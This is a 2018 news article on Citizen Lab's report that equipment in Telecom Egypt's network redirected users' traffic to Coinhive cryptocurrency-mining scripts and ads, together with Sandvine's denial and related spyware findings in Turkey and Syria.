Egyptian Telecom Giant Redirecting Internet Users’ Computers To Mine Monero

Crime, News | March 12, 2018 By:

The University of Toronto’s Citizen Lab has discovered that the Egyptian government has been using a malware to redirect their citizens’ computers to mine Monero.

The technology research lab claimed in a study that they identified a scheme they call “AdHose” that secretly redirects Egyptian Internet users’ web traffic to a malware that used their computers to mine the Monero cryptocurrency or display ads. AdHose relies on hardware installed within the networks of Telecom Egypt.

The report said the scheme has two modes: “spray mode” and “trickle mode.” In spray mode, any website that affected users tried to visit would redirect their browsers to either an ad network or cryptocurrency mining malware called Coinhive. One scan in January found 95% of devices observed, numbering over 5,700, were affected by AdHose.

Trickle mode means that only attempts to open certain URLs redirects users to these ads or mining scripts, specifically (which was formerly the website of the Pope of the Coptic Orthodox Church of Alexandria) and (formerly a porn site).

The hardware used to implement AdHose is Sandvine PacketLogic devices, which have been associated with government surveillance in Turkey and Syria. It also doubles up as a censorship tool. It blocks access to news outlets like Al Jazeera and NGOs like Human Rights Watch.

Sandvine denied that its products possess the capabilities described in the report. The company said based on a preliminary review of the report, certain Citizen Lab allegations are technically inaccurate and intentionally misleading.

“We have never had, directly or indirectly, any commercial or technology relationship with any known malware vendors, and our products do not and cannot inject malicious software,” Sandvine said in a statement. “While our products include a redirection feature, HTTP redirection is a commodity-like technology that is commonly included in many types of technology products.”

The technology research lab also found similar schemes in Turkey and Syria, although instead of crypto mining or ads, users were served with spyware when they thought they were downloading legitimate anti-virus programs.

Coinhive has previously been linked to a large case of cryptojacking. It has been discovered in Google’s DoubleClick ad services, the Ultimate Fighting Championship website, and TV network Showtime, among many others.